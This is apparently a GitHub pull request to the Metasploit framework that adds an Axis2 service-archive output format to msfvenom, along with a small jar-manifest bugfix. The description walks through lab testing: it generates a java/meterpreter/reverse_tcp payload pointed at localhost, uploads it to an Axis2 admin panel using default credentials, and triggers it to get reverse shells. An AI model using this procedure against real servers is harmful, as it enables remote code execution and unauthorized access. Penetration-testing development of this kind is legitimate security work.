### PR TITLE
msfvenom - Add axis2 payload generator

### DIFF
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -284,20 +284,26 @@ module Msf
       payload_module = framework.payloads.create(payload)
       payload_module.datastore.merge!(datastore)
       case format
-        when "raw", "jar"
-          if payload_module.respond_to? :generate_jar
-            payload_module.generate_jar.pack
-          else
-            payload_module.generate
-          end
-        when "war"
-          if payload_module.respond_to? :generate_war
-            payload_module.generate_war.pack
-          else
-            raise InvalidFormat, "#{payload} is not a Java payload"
-          end
+      when "raw", "jar"
+        if payload_module.respond_to? :generate_jar
+          payload_module.generate_jar.pack
         else
-          raise InvalidFormat, "#{format} is not a valid format for Java payloads"
+          payload_module.generate
+        end
+      when "war"
+        if payload_module.respond_to? :generate_war
+          payload_module.generate_war.pack
+        else
+          raise InvalidFormat, "#{payload} is not a Java payload"
+        end
+      when "axis2"
+        if payload_module.respond_to? :generate_axis2
+          payload_module.generate_axis2.pack
+        else
+          raise InvalidFormat, "#{payload} is not a Java payload"
+        end
+      else
+        raise InvalidFormat, "#{format} is not a valid format for Java payloads"
       end
     end
 

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -2221,6 +2221,7 @@ require 'msf/core/exe/segment_appender'
       "asp",
       "aspx",
       "aspx-exe",
+      "axis2",
       "dll",
       "elf",
       "elf-so",

--- a/lib/rex/zip/jar.rb
+++ b/lib/rex/zip/jar.rb
@@ -47,8 +47,9 @@ class Jar < Archive
   #
   def build_manifest(opts={})
     main_class = (opts[:main_class] ? randomize(opts[:main_class]) : nil)
-    app_name = (opts[:app_name] ? randomize(opts[:main_class]) : nil)
+    app_name = (opts[:app_name] ? randomize(opts[:app_name]) : nil)
     existing_manifest = nil
+    meta_inf_exists = @entries.find_all{|item| item.name == 'META-INF/' }.length > 0
 
     @manifest =  "Manifest-Version: 1.0\r\n"
     @manifest << "Main-Class: #{main_class}\r\n" if main_class
@@ -69,7 +70,7 @@ class Jar < Archive
     if existing_manifest
       existing_manifest.data = @manifest
     else
-      add_file("META-INF/", '')
+      add_file("META-INF/", '') unless meta_inf_exists
       add_file("META-INF/MANIFEST.MF", @manifest)
     end
   end
@@ -280,4 +281,3 @@ end
 
 end
 end
-


### PR DESCRIPTION
This PR adds a axis2 payload generator to msfvenom. To test you need to set up axis 2:
- [x] Download tomcat and extract it: http://tomcat.apache.org/download-80.cgi#8.0.33
- [x] Download axis2 war archive and extract it: http://www.apache.org/dyn/closer.lua/axis/axis2/java/core/1.7.2/axis2-1.7.2-war.zip
- [x] Edit `tomcat/conf/tomcat-users.xml` and add

```
<role rolename="manager-gui"/>
<user username="admin" password="admin" roles="manager-gui"/>
```
- [x] Go to `tomcat/bin` and run `chmod +x *.sh`
- [x] Start tomcat via `bin/startup.sh`
- [x] Go to http://127.0.0.1:8080/manager/html and login with `admin // admin`
- [x] Under `WAR file to deploy` select the extracted axis war file and click deploy (the /axis2 app should appear)
- [x] Go to `/axis2`, click on administration and log in with `admin // axis2`
- [x] Generate a payload:

```
./msfvenom -p java/meterpreter/reverse_tcp -o /Users/firefart/Downloads/meterpreter.aar -f axis2 LHOST=127.0.0.1 LPORT=4444
```
- [x] In the axis2 admin gui click on upload service and upload the aar file (you have to rename it locally if you want to upload it again because the filename on the server does not change)
- [x] Click on available services and locate the service with the cryptic name
- [x] Start your handler
- [x] append `/run` at the end of your service url to trigger the exploit: `http://127.0.0.1:8080/axis2/services/ykzbrrtebtbsr/run`
- [x] Watch shells coming in
  <img width="720" alt="screen shot 2016-05-12 at 22 56 36" src="https://cloud.githubusercontent.com/assets/105281/15230217/d8590a48-1894-11e6-9c43-7b1717f39d16.png">
- [x] Don't forget to stop tomcat via `bin/shutdown.sh`
